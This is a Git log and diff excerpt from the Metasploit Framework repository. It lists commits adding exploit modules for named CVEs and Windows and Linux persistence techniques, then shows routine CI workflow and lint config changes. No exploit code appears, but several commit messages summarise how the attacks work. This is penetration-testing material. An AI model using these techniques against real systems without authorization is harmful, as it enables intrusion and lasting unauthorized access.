h00die c272d8a0aa burp extension persistence 2026-01-04 08:06:14 -05:00
h00die 30e8ede308 windows and linux build portions working, debugging java 2026-01-04 08:06:14 -05:00
h00die 190fab9b0a windows and linux build portions working 2026-01-04 08:06:14 -05:00
h00die 2213da29bb linux working, windows payload issues on compile and zip error on pre-built 2026-01-04 08:06:14 -05:00
h00die 8752110581 non-compile working just needs testing 2026-01-04 08:06:14 -05:00
h00die 24d1b43d2e more trial and error 2026-01-04 08:06:14 -05:00
h00die 349fd82327 burp extension persistence 2026-01-04 08:06:14 -05:00
h00die 773f2c4b8b burp extension persistence 2026-01-04 08:06:14 -05:00
h00die d7d7a318ed Add docs and tidy to userinit persistence 2026-01-03 16:27:54 -05:00
root d2c192e9bf windows persistence userinit v6 2026-01-03 15:37:44 -05:00
root cb7dd50731 windows persistence userinit v5 2026-01-03 15:21:20 -05:00
root f6fdbc4fbd windows persistence userinit v4 2026-01-03 14:43:50 -05:00
root beff06b9a4 windows persistence userinit v3 2026-01-03 11:09:14 -05:00
h00die c485d9a822 active setup persistence 2026-01-03 10:39:45 -05:00
6a6f656c 4a3a26e9d9 windows persistence userinit v2 2026-01-02 09:33:21 -05:00
6a6f656c 9d120c1eeb windows persistence userinit 2026-01-02 07:21:05 -05:00
h00die 7017273a84 bits persistence works 2026-01-01 19:55:22 -05:00
h00die 47c47df0bb bits persistence works 2026-01-01 08:28:03 -05:00
h00die e778f40055 bits persistence works but no delay happening 2026-01-01 08:05:41 -05:00
jenkins-metasploit 7eccbcdc6c Bump version of framework to 6.4.106 2026-01-01 03:35:39 +00:00
gregd c225256956 Add meterpreter scenario and redact IPs in documentation 2025-12-31 15:37:46 +00:00
gregd 475846ea2a Add Eclipse Che machine-exec unauthenticated RCE (CVE-2025-12548)
This module exploits an unauthenticated RCE vulnerability in the
Eclipse Che machine-exec service. The service accepts WebSocket
connections without authentication on port 3333, allowing command
execution via JSON-RPC.

Affects Red Hat OpenShift DevSpaces environments.
2025-12-30 21:14:55 +00:00
kukly 7772bd87f0 Fix teamviewer_password module errors 2025-12-30 16:07:23 +01:00
DataExplorerX 102ef677b1 Add documentation for linux/samba/chain_reply module (CVE-2004-0883) 2025-12-30 16:17:51 +05:30
DataExplorerX 1e769ad5aa Fix broken links in CONTRIBUTING.md code-free contributions section 2025-12-30 15:34:03 +05:30
Rudraditya Thakur 4fbc647903 fixed: merge conflict 2025-12-28 23:41:36 +05:30
Rudraditya Thakur 8342493b3b Merge branch 'rapid7:master' into feature/kerberos-clock-skew 2025-12-28 23:16:27 +05:30
h00die 0a5cccf5e6 wsl startup folder persistence 2025-12-28 11:17:28 -05:00
h00die e97c23ca16 wsl startup folder persistence 2025-12-28 11:15:04 -05:00
randomstr1ng 911f8e4f6e fix !gsub output error 2025-12-28 09:57:39 +01:00
h00die 2b85112a36 fix panda local privesc refs 2025-12-27 09:09:19 -05:00
h00die 8838733f97 s4u persistence updates 2025-12-27 07:43:51 -05:00
h00die a44fe6f992 s4u persistence updates 2025-12-27 07:33:15 -05:00
randomstr1ng ba00ec5904 Merge branch 'rapid7:master' into master 2025-12-26 19:07:40 +01:00
Lukas Johannes Möller 982f5e0e28 control_web_panel_api_cmd_exec.rb aktualisieren
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
2025-12-26 16:04:42 +01:00
Lukas Johannes Möller 0bfb77d74f control_web_panel_api_cmd_exec.rb aktualisieren
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
2025-12-26 16:04:12 +01:00
JohannesLks 07e2d72ffe source address kernel decision 2025-12-26 09:25:20 -05:00
JohannesLks b6a8ac87b1 Improvements from PR 2025-12-26 09:20:10 -05:00
kali 2448429502 Add Prison Management System 1.0 auth RCE (CVE-2024-48594) 2025-12-26 08:08:49 +02:00
JohannesLks 78052b4ac1 multiple Improvements 2025-12-25 11:47:23 -05:00
JohannesLks 2cadcfe6ab add CVE-2025-68613 2025-12-25 11:21:28 -05:00
Vaibhav Gupta 3fc047db5d fix: Allow Acunetix vulnerabilities to be imported without complete web_page data (#17932) 2025-12-24 22:47:37 +05:30
JohannesLks 5329e1472e fix: PR and Lint 2025-12-24 06:39:13 -05:00
JohannesLks 455275d087 add module for CVE-2025-67888 2025-12-23 19:21:34 -05:00
Jack Heysel 3c57c71baf Windows support 2025-12-22 19:27:37 -08:00
JohannesLks 0ddb9fe027 Improvements from PR 2025-12-22 05:34:40 -05:00
Jack Heysel a44fc954a2 Cacti Graph Template authenticated RCE 2025-12-22 00:53:13 -08:00
JohannesLks cf0d1d04dc lint 2025-12-21 17:30:43 -05:00
JohannesLks 5c15623f1f add RHOST again 2025-12-21 17:27:01 -05:00
JohannesLks 05582a3344 lint 2025-12-21 16:55:22 -05:00
JohannesLks 1be2858a7a Add Module and Documentation for CVE-2025-14558 2025-12-21 16:41:14 -05:00
h00die 3ea866c41d udev persistence 2025-12-21 07:50:48 -05:00
h00die eebfdc5a2a ssh_key persistence on windows now working 2025-12-19 17:26:17 -05:00
Valentin Lobstein 573a74dfa0 Add view/info.php endpoint to system root path leak (CVE-2025-34433) 2025-12-19 22:35:09 +01:00
Valentin Lobstein d8177fe9a1 DRY extract_system_root_from_cache 2025-12-19 22:05:29 +01:00
Valentin Lobstein 61b253a68d Refactor to cache endpoint responses and avoid duplicate requests 2025-12-19 22:03:07 +01:00
Valentin Lobstein 99b9e05179 Add comment about timezone fetching for uniqid calculations 2025-12-19 21:58:08 +01:00
Valentin Lobstein b1e8088498 Add comment about hashId requiring public videos 2025-12-19 21:56:53 +01:00
Valentin Lobstein 9cb8f34371 Add comment about default category deletion breaking exploit 2025-12-19 21:56:16 +01:00
Valentin Lobstein e4a6a9a71c Add comment about v20 path leak fix and fallback 2025-12-19 21:54:35 +01:00
Valentin Lobstein c5ea4bb87b Add comment about videosAndroid.json.php slow loading 2025-12-19 21:53:01 +01:00
Valentin Lobstein 8df7347791 Add AVideo notify.ffmpeg.json.php unauthenticated RCE exploit (CVE-2025-34433) 2025-12-19 21:51:41 +01:00
Martin Sutovsky 990c6a7a9f Adds check for presence of directory and sufficient rights 2025-12-19 14:31:05 +01:00
h00die d150e8f633 sshkey persistence documentation improvements 2025-12-18 16:11:02 -05:00
Valentin Lobstein 080f74f862 Update Web-Check documentation with docker-compose.yml setup instructions 2025-12-18 19:19:17 +01:00
Valentin Lobstein 5178cdee42 Update Web-Check documentation with git clone command 2025-12-18 18:56:18 +01:00
Valentin Lobstein 13f102eb5b Add Web-Check screenshot API command injection RCE exploit (CVE-2025-32778) 2025-12-18 18:51:12 +01:00
vognik cd8f1593e4 fix version check 2025-12-18 09:12:36 -08:00
vognik 9fbf4e1d67 replace vprint_status with print_status in login.rb module 2025-12-18 08:59:55 -08:00
vognik 8fdb4ab43a add delay to sudobash drop file 2025-12-18 08:49:24 -08:00
vognik 51bfa8aab8 add use_inline_splunk_query option 2025-12-18 08:22:49 -08:00
Spencer McIntyre 76b7c82092 Fix a CI failure 2025-12-18 10:33:35 -05:00
Spencer McIntyre 602adeb4c5 Mass rubocop changes 2025-12-18 10:08:31 -05:00
Valentin Lobstein d9498c35f9 Fix react2shell module: sync encoders and payload config with master version (had bad copy) 2025-12-17 23:52:30 +01:00
Spencer McIntyre d4b196b309 Update exploits to note target authors
Target authors were selected based on comments that indicated that the
author was only responsible for a set of descrete targets. Authors that
were noted as assisting with target testing, check module development,
etc. were left at the module level.
2025-12-17 17:30:16 -05:00
Valentin Lobstein 3b407575fa Update react2shell module: Add Waku framework support 2025-12-17 23:07:01 +01:00
Spencer McIntyre 276623f36b Also merge Author and References from the target 2025-12-17 16:31:54 -05:00
Spencer McIntyre 8945267db6 Remove redundant Platform and Arch definitions 2025-12-17 16:12:31 -05:00
Spencer McIntyre 2103e1b5f6 Fix a bug in the platform definition 2025-12-17 15:57:58 -05:00
Spencer McIntyre 61a7e05f9d Merge target info into module info
This means it no longer has to be specified twice.
2025-12-17 14:38:14 -05:00
vognik 59dc9dd59c fix error handling 2025-12-17 09:57:03 -08:00
vognik 6d059bd62e improve csrf token parsing 2025-12-17 09:53:28 -08:00
vognik 1d4b8ce10e add pagination support to get_apps function 2025-12-16 10:03:08 -08:00
h00die 41a2b49ef8 sshkey persistence documentation improvements 2025-12-15 20:30:45 -05:00
h00die a2a3eebe68 sshkey persistence working on linux 2025-12-15 20:25:10 -05:00
vognik 8977538910 add docker lab deploy guide into docs 2025-12-13 12:28:55 -08:00
vognik 055d243d05 add create_sudobash payload option 2025-12-13 12:00:08 -08:00
vognik 7149b9a960 randomize provider name in payload 2025-12-13 11:46:47 -08:00
vognik 35dd55159d extracted get_apps url into uris.rb 2025-12-13 11:35:25 -08:00
vognik ebd736272f fix variables naming 2025-12-13 11:21:08 -08:00
rumet 23291f2f5e Fix PostgreSQL 15+ public schema permission issue 2025-12-13 15:37:18 +03:00
vognik 4ff2f35154 fix credits 2025-12-12 20:59:29 -08:00
vognik b35c8b3926 remove unused function calls 2025-12-12 20:31:14 -08:00
vognik 0f96f2f3fd fix cve format in references 2025-12-12 13:45:52 -08:00
vognik da0dc35cb8 add documentation 2025-12-12 13:44:44 -08:00
vognik ee404d9453 add splunk modules (cve-2022-43571 and cve-2024-36985) 2025-12-12 13:16:57 -08:00
Rumet eb7f60d6d4 Fix typo in normalize_host causing AWS SSM session failures with database 2025-12-13 00:05:34 +03:00
MatDupas 591a2706cb Fix setup guide link for Oracle EBS
Updated the link to the Oracle EBS setup guide to an archived version.
2025-12-11 19:24:16 +01:00
MatDupas eaa15dbc70 Update CSRF token logging for better visibility 2025-12-11 19:21:54 +01:00
bcoles 5871d90cf6 Add Linux RISC-V 32-bit/64-bit TCP bind shell payloads 2025-12-11 12:53:47 +11:00
ptrstr 30635cbadd Make plugin URI configurable 2025-12-10 18:14:26 -05:00
Martin Sutovsky 6a626a855b Addresses some comments 2025-12-10 17:01:27 +01:00
h00die b9dc042838 sshkey persistence working on linux 2025-12-10 04:32:38 -05:00
h00die c2adbf7625 ssh key progresss 2025-12-10 04:32:37 -05:00
h00die f221eb1aef rename sshkey module 2025-12-10 04:32:37 -05:00
h00die f18bdb12b2 remove writabledir from wmi persistence 2025-12-08 15:41:16 -05:00
Rudraditya Thakur c49a376280 added: Option to adjust kerberos clock (issue-> #20587)
- Added KrbClockSkew advanced option and parser to offset Kerberos timestamps
- Propagate skew through Kerberos client/authenticators (LDAP/SMB/HTTP/WinRM/MSSQL) and scanners
- Updated docs for new option and extended kerberos client specs for clock skew handling
- Clean up kerberos client error handling/style per rubocop
2025-12-08 01:47:51 +05:30
h00die 54d47e72ab sticky keys description update 2025-12-07 07:40:54 -05:00
h00die bd48eda8b2 rename sticky keys module 2025-12-07 07:38:41 -05:00
MatDupas 6d79e9a858 Improve XML formatting in send_exploit_request method
Refactor XML string for better readability.
2025-12-07 08:26:01 +01:00
MatDupas 7b9cc2800f Remove keep-alive logic for XSL delivery
Removed unnecessary server keep-alive logic after XSL delivery.
2025-12-07 08:11:42 +01:00
MatDupas a8a84a6c99 Fix command adaptation for Windows platform 2025-12-07 08:09:05 +01:00
MatDupas f56a3cc914 Refactor comments and improve logging in exploit 2025-12-06 15:41:30 +01:00
MatDupas a4b88df7ac Update modules/exploits/multi/http/oracle_ebs_cve_2025_61882_exploit_rce.rb
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
2025-12-06 15:38:42 +01:00
MatDupas 2754087ed9 Remove wait time before server URL construction
Removed unnecessary sleep before constructing server URL.
2025-12-05 16:50:30 +01:00
MatDupas 5d49fb9e53 Change base command from bash to sh for compatibility 2025-12-05 16:39:56 +01:00
MatDupas a33fbe3ef5 Refactor payload encoding in cook_smuggle_stub method
Replaced manual HTML encoding with Rex::Text.html_encode for better payload handling.
2025-12-05 16:38:30 +01:00
MatDupas d3bda52631 Update modules/exploits/multi/http/oracle_ebs_cve_2025_61882_exploit_rce.rb
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
2025-12-05 15:45:05 +01:00
MatDupas 976a835557 Update modules/exploits/multi/http/oracle_ebs_cve_2025_61882_exploit_rce.rb
Mark @xsl as served once it has actually been served.

Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
2025-12-05 15:39:16 +01:00
MatDupas 145a2a63de Update modules/exploits/multi/http/oracle_ebs_cve_2025_61882_exploit_rce.rb
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
2025-12-05 15:36:56 +01:00
h00die 54718c7a12 sticky keys as persistence 2025-12-05 07:07:30 -05:00
Mathieu Dupas 9989fa6d39 Add SRVPORT info 2025-12-05 12:14:15 +01:00
MatDupas cdba4f49ae Add Oracle EBS CVE-2025-61882 RCE exploit module
This module exploits CVE-2025-61882 in Oracle E-Business Suite by combining SSRF, Path Traversal, HTTP request smuggling, and XSLT injection to achieve remote code execution.
2025-12-05 11:12:07 +01:00
MatDupas cd2e13c71d Document CVE-2025-61882 exploit for Oracle EBS
Added documentation for CVE-2025-61882 exploit module in Oracle EBS, detailing vulnerability, testing setup, verification steps, and usage scenarios.
2025-12-05 11:05:42 +01:00
Kyle Bouchard 7b816cd439 Add year and month options for file upload 2025-12-04 11:33:28 -05:00
Kyle Bouchard 78710633e2 Remove current date constraint from uploaded path 2025-12-03 15:46:07 -05:00
FutileSkills 2927050056 Revise escpos_tcp_command_injector documentation
Updated the documentation for the escpos_tcp_command_injector module to reflect changes in option names and usage instructions.
2025-12-03 04:35:38 -06:00
FutileSkills 8a2df64987 Update default action in escpos_tcp_command_injector 2025-12-03 04:22:00 -06:00
FutileSkills 49d68e0991 Fix formatting of drawer count option in escpos_tcp_command_injector 2025-12-03 04:09:53 -06:00
FutileSkills 8589d7cc40 Update modules/auxiliary/admin/printer/escpos_tcp_command_injector.rb
Co-authored-by: Brendan <bwatters@rapid7.com>
2025-12-03 03:58:28 -06:00
FutileSkills f4a3e67b0c Update modules/auxiliary/admin/printer/escpos_tcp_command_injector.rb
Co-authored-by: Brendan <bwatters@rapid7.com>
2025-12-03 03:58:08 -06:00
FutileSkills 6e89c9bced Update modules/auxiliary/admin/printer/escpos_tcp_command_injector.rb
Co-authored-by: Brendan <bwatters@rapid7.com>
2025-12-03 03:57:33 -06:00
h00die d3ae3e5556 wmi persistence docs 2025-11-30 10:51:45 -05:00
whotwagner 4decd07c29 Merged changes 2025-11-28 20:54:40 +00:00
whotwagner 2018f9f1c3 Refactoring taiga-exploit 2025-11-28 20:53:26 +00:00
Christophe De La Fuente a392283b1e Add techniques related to unconstrained delegation modules 2025-11-28 19:17:03 +01:00
Christophe De La Fuente 8e51f598f3 Add MITRE ATT&CK technique for Kerberos related modules 2025-11-28 17:29:57 +01:00
Martin Sutovsky 20fcecc963 Adds exception raising 2025-11-28 12:40:23 +01:00
Shubham0699 d3f617bf08 Fix Bailiwicked module exceptions and SRCPORT default
Fixes #20172

Both bailiwicked modules were throwing 'undefined method each for IPAddr'
exceptions due to DNS library changes. Fixed by:

1. Wrapping IPAddr object in array when passing to nameservers parameter
   - Changed nameservers: rr1.address to nameservers: [rr1.address.to_s]
   - Applies to both bailiwicked_domain.rb and bailiwicked_host.rb

2. Changed SRCPORT default from nil to 0 for automatic port selection
   - Prevents validation errors when running modules
   - 0 is the documented value for automatic port selection
2025-11-27 21:19:02 +05:30
bcoles 2d414d39fa Add Linux RISC-V command payload adapters 2025-11-27 20:46:30 +11:00
h00die c997549060 wmi persistence docs 2025-11-22 16:38:57 -05:00
h00die b996c0ee4c wmi persistence 2025-11-22 16:37:57 -05:00
h00die 45250497d5 wmi uptime persistence 2025-11-22 09:13:01 -05:00
Martin Sutovsky 72d7e1a6f1 Rubocopes 2025-11-21 13:18:11 +01:00
h00die 3251560ebc wmi interval 2025-11-20 18:52:22 -05:00
whotwagner 55f660ccfb Update modules/exploits/multi/http/taiga_tribe_gig_unserial.rb
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
2025-11-20 16:56:58 +01:00
whotwagner 932eae7034 Update modules/exploits/multi/http/taiga_tribe_gig_unserial.rb
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
2025-11-20 16:55:32 +01:00
whotwagner 04e64697c0 Refactoring taiga-exploit 2025-11-19 21:29:10 +00:00
whotwagner 1e5bd6def5 Refactoring taiga-exploit 2025-11-19 20:31:33 +00:00
whotwagner d8bb16d579 Refactoring taiga-exploit 2025-11-19 20:12:18 +00:00
whotwagner 467b5c25b3 Refactoring taiga-exploit 2025-11-19 20:09:30 +00:00
whotwagner 0781d618fd Refactoring taiga-exploit 2025-11-19 19:43:27 +00:00
whotwagner 4c3ee4f499 Refactoring taiga-exploit and docs 2025-11-19 19:09:46 +00:00
Martin Sutovsky 197dbf921d Fixes Windows persistence 2025-11-19 07:52:54 +01:00
Martin Sutovsky ec8906bbd4 Adds docs 2025-11-19 07:17:07 +01:00
Martin Sutovsky 1241cb724e Adds MITRE reference, adds additional datastore options, code cleanup 2025-11-19 06:58:56 +01:00
h00die 2d41323e78 event_log working 2025-11-18 19:40:03 -05:00
whotwagner 5c6b0543a4 Fixed a typo in taiga-module-docs 2025-11-18 09:59:26 +00:00
whotwagner f80f10ce3d Refactoring taiga-exploit 2025-11-18 09:58:47 +00:00
whotwagner 351bba0c45 Renamed extension for taiga-exploit-docs to .md 2025-11-18 09:52:06 +00:00
h00die 19661e5694 temp for windows wmi persistence 2025-11-17 16:53:58 -05:00
Martin Sutovsky 92c2f2516d Adds option for user-specified path 2025-11-17 11:42:42 +01:00
whotwagner ffe3d0acf8 Merge branch 'exploit_taiga_tribe_gig' of github.com:whotwagner/metasploit-framework into exploit_taiga_tribe_gig 2025-11-15 22:41:17 +00:00
whotwagner ba24ea0362 Added exploit module for unserialization vulnerability in taiga.io(CVE-2025-62368) 2025-11-15 22:41:01 +00:00
whotwagner 466805a631 Fixed style-issues 2025-11-15 22:36:48 +00:00
Martin Sutovsky 81abe9d964 Cleans up code 2025-11-11 16:30:30 +01:00
Martin Sutovsky d238b4626d Adds Python version extraction for Windows 2025-11-11 15:57:30 +01:00
Martin Sutovsky 7ac1fd9de0 Adds support for Windows 2025-11-11 10:21:08 +01:00
Martin Sutovsky 546856967a Enhances payload delivery, adds docs base 2025-11-11 08:39:40 +01:00
Martin Sutovsky 2f361af316 Module init 2025-11-10 16:27:59 +01:00
futileskills 461ad3e0e2 msftidy fixes 2025-10-10 13:41:35 -05:00
futileskills d1cdf21551 formating fixes 2025-10-10 13:28:21 -05:00
futileskills 732ca0752b Apply review feedback to escpos module 2025-10-10 12:40:10 -05:00
FutileSkills d2e470f8c2 Update modules/auxiliary/admin/printer/escpos_tcp_command_injector.rb
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
2025-10-10 12:05:44 -05:00
BenoitDePaoli f9f0530640 fix(console): prevent RHOSTS temp file deletion after services -R 2025-10-07 14:24:50 +02:00
futileskills 046c1338e2 Fix NameError by correcting Msf namespace 2025-09-24 12:50:09 -05:00
futileskills 7627bd177e Simplify module options and logic 2025-09-23 06:19:42 -05:00
futileskills e7e40d3eeb rubocop fixes 2025-09-20 00:50:07 -05:00
FutileSkills fb3b4c1f2d Update escpos_tcp_command_injector.rb
Added Notes Section to satisfy rubocop
2025-09-20 00:42:59 -05:00
FutileSkills 02c5abf9c3 Merge branch 'rapid7:master' into escpos-injector-module 2025-09-20 00:33:26 -05:00
randomstr1ng a2f02dc376 fix output issue off sap_router_portscanner module 2025-09-02 10:04:46 +02:00
FutileSkills 437dbd962f Merge branch 'rapid7:master' into escpos-injector-module 2025-08-27 18:03:23 -05:00
futileskills 3d942168fe added vulnerable application description 2025-08-27 12:36:25 -05:00
futileskills 58ac914821 Added missing line from end of file/ msftidy_docs formating 2025-08-23 07:08:26 -05:00
futileskills 1621d4f756 Added option for feed lines and cut paper for better handling 2025-08-23 06:53:18 -05:00
FutileSkills 4fd97d5d0c syntax fix 2025-08-22 10:53:21 -05:00
FutileSkills 7cdcace837 remade Doc file. 2025-08-22 09:07:25 -05:00
FutileSkills 9a5670b8f1 Deleted some unnecessary lines 2025-08-22 08:20:52 -05:00
FutileSkills f06cff951a QOL tweaks to escpos_tcp_command_injector.rb 2025-08-22 07:59:02 -05:00
Mike 705a346b43 Update escpos_tcp_command_injector.rb 2025-08-19 06:23:22 -05:00
Mike f126885f91 Create escpos_tcp_command_injector.md 2025-08-19 06:56:16 -04:00
Mike e9a7abaac7 Update escpos_tcp_command_injector.rb
Clean up ESC/POS printer command injector: remove unnecessary HEX_COMMANDS feature, add documentation, references, and comments
2025-08-19 05:49:20 -04:00
Mike 4e64a0a8e5 Create escpos_tcp_command_injector.rb 2025-08-18 18:31:16 -04:00
haicen 3dd65e3e1f Changes uploaded file to .php instead of .phar 2025-08-10 20:52:42 -04:00
haicen bd50485c95 Added modules to exploit Xerte Online Toolkits 2025-08-08 14:12:23 -04:00
Martin Sutovsky 5f1ff38293 Adds check for version negotiation response 2025-07-08 07:27:32 +02:00
Isaac 1db87f1501 fix-issue-19384
Resolve issue 19384 where msfvenom was unable to be run outside of the metasploit working directory.
2025-07-04 14:02:20 -04:00
dledda-r7 98f0183805 fix(sources): fixed poolparty stub to graceful exit after callback 2024-09-25 08:10:53 -04:00
dledda-r7 3a4b5eb372 feat(sources): including shellcodes used during pool-party injection 2024-09-25 05:14:58 -04:00
2651 changed files with 117757 additions and 28904 deletions
+3
View File
@@ -0,0 +1,3 @@
# Copilot Instructions
Refer to [AGENTS.md](../AGENTS.md) in the repository root for all project conventions, coding standards, and AI agent guidelines.
+19
View File
@@ -0,0 +1,19 @@
name: Add pull request to the kanban board
on:
pull_request_target:
types:
- opened
- reopened
jobs:
add-to-project:
name: Add pull request to the kanban board
runs-on: ubuntu-latest
steps:
- uses: actions/add-to-project@v1.0.2
with:
project-url: https://github.com/orgs/rapid7/projects/17
# smcintyre/GITHUB_PROJECT_TOKEN (PAT), Expires on Wed, Jan 27 2027
github-token: ${{ secrets.GH_PROJECT_TOKEN }}
+68
View File
@@ -0,0 +1,68 @@
name: Extended Tests
# https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#permissions
permissions:
actions: none
checks: none
contents: none
deployments: none
id-token: none
issues: none
discussions: none
packages: none
pages: none
# This action can update/close pull requests
pull-requests: write
repository-projects: none
security-events: none
statuses: none
on:
pull_request_target:
branches:
- '*'
paths:
- '**/**ldap**'
- '**/**kerberos**'
- '**/**gss**'
jobs:
add-labels:
runs-on: ubuntu-latest
steps:
- uses: actions/github-script@v6
with:
github-token: ${{secrets.GITHUB_TOKEN}}
script: |
// NOTE: The following section is JavaScript. Note that backticks will need to be escaped within
// the multiline comment strings in the following config. When editing this file, using JavaScript
// syntax highlighting might be easier.
//
// This script has intentionally been inlined instead of using third-party Github actions for both
// security and performance reasons.
const currentLabelNames = context.payload.pull_request.labels.map(label => label.name);
const newLabelName = "additional-testing-required";
const comment = `
Thanks for your pull request! As part of our landing process, we manually verify that all modules work as expected.
We've added the \`${newLabelName}\` label to indicate that additional testing is required before this pull request can be merged.
For maintainers, this means visiting [here](https://jenkins-metasploit.build.r7ops.com/job/pro_manual_test_trigger/).
`;
if (!currentLabelNames.includes(newLabelName)) {
await github.rest.issues.addLabels({
issue_number: context.issue.number,
owner: context.repo.owner,
repo: context.repo.repo,
labels: [newLabelName]
});
const precedingWhitespaceLength = comment.split("\n")[1].search(/\S/);
const commentWithoutPrecedingWhitespace = comment.split("\n").map(line => line.substring(precedingWhitespaceLength)).join("\n").trim();
await github.rest.issues.createComment({
issue_number: context.issue.number,
owner: context.repo.owner,
repo: context.repo.repo,
body: commentWithoutPrecedingWhitespace
});
}
+4
View File
@@ -62,3 +62,7 @@ jobs:
ln -sf ../../tools/dev/pre-commit-hook.rb ./.git/hooks/post-merge
ls -la ./.git/hooks
./.git/hooks/post-merge
- name: Verify encoding
run: |
bundle exec ruby tools/dev/verify_encoding.rb
+31 -5
View File
@@ -12,9 +12,37 @@ on:
required: false
default: "[]"
type: string
additional_rails_versions:
description: 'Additional Rails version requirements as a JSON array (for example: ["~> 8.1.0"])'
required: false
default: "[]"
type: string
# Caller example:
# with:
# additional_rails_versions: '["~> 8.1.0", "~> 8.2.0"]'
jobs:
prepare_matrix:
runs-on: ubuntu-latest
outputs:
rails_versions: ${{ steps.merge_rails_versions.outputs.rails_versions }}
steps:
- name: Build Rails version matrix
id: merge_rails_versions
run: |
default_rails_versions='["~> 7.0.0","~> 7.1.0","~> 7.2.0"]'
additional_rails_versions='${{ inputs.additional_rails_versions }}'
rails_versions=$(jq -cn \
--argjson defaults "$default_rails_versions" \
--argjson extras "$additional_rails_versions" \
'$defaults + $extras | unique')
echo "rails_versions=$rails_versions" >> "$GITHUB_OUTPUT"
shell: bash
test:
needs: prepare_matrix
runs-on: ${{ matrix.os }}
timeout-minutes: 40
@@ -25,18 +53,16 @@ jobs:
- '3.2'
- '3.3'
- '3.4'
rails:
- '~> 7.0.0'
- '~> 7.1.0'
- '~> 7.2.0'
rails: ${{ fromJSON(needs.prepare_matrix.outputs.rails_versions) }}
postgres:
- '9.6'
- '14.19'
- '16.8'
os:
- ubuntu-latest
env:
RAILS_ENV: test
RAILS_VERSION: ${{ matrix.rails }}
name: ${{ matrix.os }} - Ruby ${{ matrix.ruby }} - Rails ${{ matrix.rails }} - PostgreSQL ${{ matrix.postgres }}
steps:
@@ -112,8 +112,18 @@ jobs:
if: runner.os == 'Linux'
run: sudo apt-get -y --no-install-recommends install libpcap-dev graphviz
- uses: shivammathur/setup-php@c541c155eee45413f5b09a52248675b1a2575231
if: ${{ matrix.meterpreter.name == 'php' }}
# Use setup-php@2.31.1 for Windows (PHP 5.3 on windows-2022 is broken with later versions while PHP 7.4 and 8.3
# are broken on MacOS with this version)
- name: Use setup-php@2.31.1 to install PHP for Windows runners
uses: shivammathur/setup-php@c541c155eee45413f5b09a52248675b1a2575231
if: ${{ matrix.meterpreter.name == 'php' && runner.os == 'Windows' }}
with:
php-version: ${{ matrix.meterpreter.runtime_version }}
tools: none
- name: Use setup-php@2.37.0 to install PHP for non-Windows runners
uses: shivammathur/setup-php@accd6127cb78bee3e8082180cb391013d204ef9f
if: ${{ matrix.meterpreter.name == 'php' && runner.os != 'Windows' }}
with:
php-version: ${{ matrix.meterpreter.runtime_version }}
tools: none
@@ -192,7 +202,7 @@ jobs:
ref: ${{ inputs.metasploit_framework_commit }}
# https://github.com/orgs/community/discussions/26952
- name: Support longpaths
- name: Support longpaths when running on Windows
if: runner.os == 'Windows'
run: git config --system core.longpaths true
@@ -274,21 +284,21 @@ jobs:
run: |
Set-Location "C:\Program Files (x86)\Microsoft Visual Studio\Installer\"
dir
$InstallPath = "C:\Program Files\Microsoft Visual Studio\2022\Enterprise"
$WorkLoads = '--config "D:\a\metasploit-payloads\metasploit-payloads\metasploit-payloads\c\meterpreter\vs-configs\vs2022.vsconfig"'
$Arguments = ('/c', "vs_installer.exe", 'modify', '--installPath', "`"$InstallPath`"", $WorkLoads, '--quiet', '--norestart', '--nocache')
$process = Start-Process -FilePath cmd.exe -ArgumentList $Arguments -Wait -PassThru -WindowStyle Hidden
if ($process.ExitCode -eq 0) {
Write-Host "components have been successfully added"
} else {
Write-Host "components were not installed"
exit 1
}
Set-Location "D:\a\metasploit-payloads\metasploit-payloads\metasploit-payloads\c\meterpreter"
$r = Invoke-Command -ScriptBlock { cmd.exe /c 'git submodule init && git submodule update' }
Write-Host $r
$r = Invoke-Command -ScriptBlock { cmd.exe /c '"C:\Program Files\Microsoft Visual Studio\2022\Enterprise\Common7\Tools\VsDevCmd.bat" && make.bat' }
Write-Host $r
# $InstallPath = "C:\Program Files\Microsoft Visual Studio\2022\Enterprise"
# $WorkLoads = '--config "D:\a\metasploit-payloads\metasploit-payloads\metasploit-payloads\c\meterpreter\vs-configs\vs2022.vsconfig"'
# $Arguments = ('/c', "vs_installer.exe", 'modify', '--installPath', "`"$InstallPath`"", $WorkLoads, '--quiet', '--norestart', '--nocache')
# $process = Start-Process -FilePath cmd.exe -ArgumentList $Arguments -Wait -PassThru -WindowStyle Hidden
# if ($process.ExitCode -eq 0) {
# Write-Host "components have been successfully added"
# } else {
# Write-Host "components were not installed"
# exit 1
# }
# Set-Location "D:\a\metasploit-payloads\metasploit-payloads\metasploit-payloads\c\meterpreter"
# $r = Invoke-Command -ScriptBlock { cmd.exe /c 'git submodule init && git submodule update' }
# Write-Host $r
# $r = Invoke-Command -ScriptBlock { cmd.exe /c '"C:\Program Files\Microsoft Visual Studio\2022\Enterprise\Common7\Tools\VsDevCmd.bat" && make.bat' }
# Write-Host $r
working-directory: metasploit-payloads
- name: Build Windows payloads via Visual Studio 2025 Build (Windows)
+3
View File
@@ -102,3 +102,6 @@ rspec.failures
#Ignore any base disk store files
db/modules_metadata_base.pstore
# gradle build files
**/.gradle
+12
View File
@@ -0,0 +1,12 @@
---
inclusion: always
---
# Metasploit Framework — Kiro Steering
Follow the project's AI agent instructions and coding conventions defined in the repository root.
## References
- AI agent instructions: #[[file:AGENTS.md]]
- Contributing guide: #[[file:CONTRIBUTING.md]]
- RuboCop config: #[[file:.rubocop.yml]]
+13
View File
@@ -25,6 +25,8 @@ require:
- ./lib/rubocop/cop/lint/detect_invalid_pack_directives.rb
- ./lib/rubocop/cop/lint/detect_metadata_trailing_leading_whitespace.rb
- ./lib/rubocop/cop/lint/detect_outdated_cmd_exec_api.rb
- ./lib/rubocop/cop/lint/datastore_srvhost_usage.rb
- ./lib/rubocop/cop/lint/bare_check_code_in_non_exploit.rb
Layout/SpaceBeforeBrackets:
Enabled: true
@@ -683,3 +685,14 @@ Lint/DetectOutdatedCmdExecApi:
Detects outdated usage of cmd_exec with separate arguments.
